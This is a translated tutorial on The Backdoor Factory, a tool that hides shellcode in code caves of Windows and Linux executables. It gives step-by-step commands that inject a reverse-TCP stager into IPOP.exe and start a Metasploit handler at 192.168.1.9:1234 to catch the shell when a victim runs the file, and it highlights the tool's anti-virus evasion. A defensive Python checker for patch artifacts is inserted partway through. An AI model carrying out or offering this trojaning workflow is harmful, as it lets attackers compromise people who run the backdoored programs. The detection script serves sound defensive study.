0x00 Preface

Reference: lesson 9 of the Micro8 series: https://micro8.gitbook.io/micro8/contents-1/1-10/9-gong-ju-jie-shao-thebackdoorfactory

0x01 Introduction

The Backdoor Factory (BDF) is a simple, practical backdoor-construction tool that supports executables of two formats, Windows PE and Linux ELF. At present its anti-virus evasion is only average.

BDF's goal is to patch an executable binary with the shellcode the user requires while the binary continues to execute normally, exactly as it did before patching.

With this tool, a user can insert malicious shellcode into the gaps of a file's code without breaking the original executable's functionality; when the executable is run, the malicious code is triggered. BDF not only ships with commonly used payloads but also allows embedding shellcode generated by other tools such as Metasploit.

Tool features:

  • The target file is copied and the copy is patched
  • Reverse-connection payloads are injected
  • PE/COFF headers are modified to add extra options for all Win32 DLLs

Introduction on the Kali site: https://tools.kali.org/exploitation-tools/backdoor-factory

Tool repository: https://github.com/secretsquirrel/the-backdoor-factory

Note: the BDF preinstalled in Kali by default has problems; download it from GitHub instead.

0x02 Basic principle

Executable binaries contain large runs of 0x00 bytes that hold no data and therefore mean nothing to the program. Those runs (code caves) can be overwritten with a payload, and when the program runs, a JMP inserted into the code path transfers control to the cave and triggers the payload.

Using the encoding and encryption techniques of its patching method, Win32 PE backdoors can be generated easily, which helps bypass detection by some anti-virus software and achieves a certain degree of evasion.

0x03 Basic usage

Download BDF:

git clone https://github.com/secretsquirrel/the-backdoor-factory.git

View the parameter help: ./backdoor.py -h

Usage: backdoor.py [options]

Options:
-h, --help show this help message and exit
-f FILE, --file=FILE File to backdoor
-s SHELL, --shell=SHELL
Payloads that are available for use. Use 'show' to see
payloads.
-H HOST, --hostip=HOST
IP of the C2 for reverse connections.
-P PORT, --port=PORT The port to either connect back to for reverse shells
or to listen on for bind shells
-J, --cave_jumping Select this options if you want to use code cave
jumping to further hide your shellcode in the binary.
-a, --add_new_section
Mandating that a new section be added to the exe
(better success) but less av avoidance
-U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
User supplied shellcode, make sure that it matches the
architecture that you are targeting.
-c, --cave The cave flag will find code caves that can be used
for stashing shellcode. This will print to all the
code caves of a specific size.The -l flag can be use
with this setting.
-l SHELL_LEN, --shell_length=SHELL_LEN
For use with -c to help find code caves of different
sizes
-o OUTPUT, --output-file=OUTPUT
The backdoor output file
-n NSECTION, --section=NSECTION
New section name must be less than seven characters
-d DIR, --directory=DIR
This is the location of the files that you want to
backdoor. You can make a directory of file backdooring
faster by forcing the attaching of a codecave to the
exe by using the -a setting.
-w, --change_access This flag changes the section that houses the codecave
to RWE. Sometimes this is necessary. Enabled by
default. If disabled, the backdoor may fail.
-i, --injector This command turns the backdoor factory in a hunt and
shellcode inject type of mechanism. Edit the target
settings in the injector module.
-u SUFFIX, --suffix=SUFFIX
For use with injector, places a suffix on the original
file for easy recovery
-D, --delete_original
For use with injector module. This command deletes
the original file. Not for use in production systems.
*Author not responsible for stupid uses.*
-O DISK_OFFSET, --disk_offset=DISK_OFFSET
Starting point on disk offset, in bytes. Some authors
want to obfuscate their on disk offset to avoid
reverse engineering, if you find one of those files
use this flag, after you find the offset.
-S, --support_check To determine if the file is supported by BDF prior to
backdooring the file. For use by itself or with
verbose. This check happens automatically if the
backdooring is attempted.
-M, --cave-miner Future use, to help determine smallest shellcode
possible in a PE file
-q, --no_banner Kills the banner.
-v, --verbose For debug information output.
-T IMAGE_TYPE, --image-type=IMAGE_TYPE
ALL, x86, or x64 type binaries only. Default=ALL
-Z, --zero_cert Allows for the overwriting of the pointer to the PE
certificate table effectively removing the certificate
from the binary for all intents and purposes.
-R, --runas_admin EXPERIMENTAL Checks the PE binaries for
'requestedExecutionLevel level="highestAvailable"'. If
this string is included in the binary, it must run as
system/admin. If not in Support Check mode it will
attmept to patch highestAvailable into the manifest if
requestedExecutionLevel entry exists.
-L, --patch_dll Use this setting if you DON'T want to patch DLLs.
Patches by default.
-F FAT_PRIORITY, --fat_priority=FAT_PRIORITY
For MACH-O format. If fat file, focus on which arch to
patch. Default is x64. To force x86 use -F x86, to
force both archs use -F ALL.
-B BEACON, --beacon=BEACON
For payloads that have the ability to beacon out, set
the time in secs
-m PATCH_METHOD, --patch-method=PATCH_METHOD
Patching methods for PE files, 'manual','automatic',
replace and onionduke
-b SUPPLIED_BINARY, --user_malware=SUPPLIED_BINARY
For onionduke. Provide your desired binary.
-X, --xp_mode Default: DO NOT support for XP legacy machines, use -X
to support XP. By default the binary will crash on XP
machines (e.g. sandboxes)
-A, --idt_in_cave EXPERIMENTAL By default a new Import Directory Table
is created in a new section, by calling this flag it
will be put in a code cave. This can cause bianry
failure is some cases. Test on target binaries first.
-C, --code_sign For those with codesigning certs wishing to sign PE
binaries only. Name your signing key and private key
signingcert.cer and signingPrivateKey.pem repectively
in the certs directory it's up to you to obtain
signing certs.
-p, --preprocess To execute preprocessing scripts in the preprocess
directory

Check whether the file supports backdoor implantation, using IPOP.exe as the example:

./backdoor.py -f ~/IPOP.exe -S

Test for code caves of size 150:

./backdoor.py -f ~/IPOP.exe -c -l 150

List the available payloads:

./backdoor.py -f ~/IPOP.exe -s show

Insert the payload and generate the patched file:

./backdoor.py -f ~/IPOP.exe -H 192.168.1.9 -P 1234 -s iat_reverse_tcp_stager_threaded

Compare the MD5 of the original file with that of the generated file:

md5sum ~/IPOP.exe ./backdoored/IPOP.exe

Compare the size of the original file with that of the generated file:

du -k ~/IPOP.exe ./backdoored/IPOP.exe
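The MD5 and size comparison above is the simplest integrity check, but a code-cave patch can leave the file size unchanged, so a defender checking a suspect copy against a known-good original wants to look at the PE structure itself. The following script is an added example written for this page and is not part of BDF or any other project. It parses the PE section table with nothing but the standard library, reports the artifacts that the flags in the help text above would leave behind (a section made RWE as with -w, a new section as with -a, a zeroed certificate-table pointer as with -Z, and a cave of at least 150 zero bytes that is no longer zero), and also implements the cave search that ./backdoor.py -c -l 150 performs. The two PE images it runs on are constructed in the script as minimal synthetic samples; the second one simply carries those artifacts so the checks can be exercised offline. Function names, the 150-byte threshold and the sample layouts are assumptions of this example, not values from the page.

```python
import hashlib
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # data-directory slot that points at the certificate table


def parse_pe(data: bytes) -> dict:
    """Minimal PE header parser: section table plus the certificate-table directory entry."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dir_base = opt + (96 if magic == 0x10B else 112)  # data directories: PE32 vs PE32+
    cert_rva, cert_size = struct.unpack_from(
        "<II", data, dir_base + IMAGE_DIRECTORY_ENTRY_SECURITY * 8)
    sections = []
    for i in range(nsections):  # each IMAGE_SECTION_HEADER is 40 bytes
        name, _vs, _va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "raw_ptr": raw_ptr, "raw_size": raw_size, "chars": chars})
    return {"sections": sections, "cert_rva": cert_rva, "cert_size": cert_size}


def find_caves(data: bytes, start: int, size: int, min_len: int) -> list:
    """Return (offset, length) for every run of 0x00 of at least min_len bytes in data[start:start+size]."""
    caves, i, end = [], start, min(start + size, len(data))
    while i < end:
        if data[i] != 0:
            i += 1
            continue
        j = i
        while j < end and data[j] == 0:
            j += 1
        if j - i >= min_len:
            caves.append((i, j - i))
        i = j
    return caves


def compare_binaries(original: bytes, suspect: bytes, min_cave: int = 150) -> list:
    """Report artifacts a code-cave patch typically leaves, relative to a known-good copy."""
    findings = []
    if len(original) != len(suspect):
        findings.append(("size_changed", f"{len(original)} -> {len(suspect)} bytes"))
    if hashlib.md5(original).digest() != hashlib.md5(suspect).digest():
        findings.append(("hash_changed", "MD5 differs from known-good copy"))
    o, s = parse_pe(original), parse_pe(suspect)
    known = {sec["name"] for sec in o["sections"]}
    for sec in s["sections"]:
        if sec["name"] not in known:
            findings.append(("new_section", sec["name"]))
        if sec["chars"] & IMAGE_SCN_MEM_EXECUTE and sec["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(("rwe_section", sec["name"]))
    if o["cert_rva"] and not s["cert_rva"]:
        findings.append(("cert_zeroed", "certificate table pointer cleared"))
    if len(original) == len(suspect):  # file offsets are only comparable if the layout is unchanged
        for sec in o["sections"]:
            for off, ln in find_caves(original, sec["raw_ptr"], sec["raw_size"], min_cave):
                if any(suspect[off:off + ln]):
                    findings.append(("cave_filled",
                                     f"{sec['name']} cave at 0x{off:x} ({ln} bytes) is no longer zero"))
    return findings


def build_sample_pe(text_body: bytes, text_chars: int, cert_rva: int) -> bytes:
    """Construct a minimal synthetic PE32 image with one .text section (sample data, not a real program)."""
    opt_size, raw_ptr = 224, 0x200
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<II", opt, 96 + IMAGE_DIRECTORY_ENTRY_SECURITY * 8,
                     cert_rva, 0x100 if cert_rva else 0)
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text_body), 0x1000,
                      len(text_body), raw_ptr, 0, 0, 0, 0, text_chars)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec
    return header + bytes(raw_ptr - len(header)) + text_body


CODE = bytes(range(1, 65)) * 2  # 128 non-zero bytes standing in for real code, followed by a 200-byte cave
CLEAN = build_sample_pe(CODE + bytes(200),
                        IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, cert_rva=0x3000)
# Same layout carrying the artifacts of an RWE section, a cleared cert pointer and a 150-byte filled cave.
PATCHED = build_sample_pe(CODE + b"\xCC" * 150 + bytes(50),
                          IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE,
                          cert_rva=0)

if __name__ == "__main__":
    for tag, detail in compare_binaries(CLEAN, PATCHED):
        print(f"[{tag}] {detail}")
```

Run it with `python3 pe_cave_check.py` (any file name works) to see the four findings for the sample pair; to use it on real files, read the original and the suspect copy with `open(path, "rb").read()` and pass them to `compare_binaries`. The cave comparison is deliberately skipped when the sizes differ, because a new section (the -a case) shifts nothing before it but a changed layout makes raw offsets meaningless; in that case the `new_section` finding is the signal.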

Start a local listener in msf:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.9
lhost => 192.168.1.9
msf exploit(handler) > set lport 1234
lport => 1234
msf exploit(handler) > exploit -j

When the target machine opens the BDF-backdoored IPOP.exe, the reverse shell is obtained.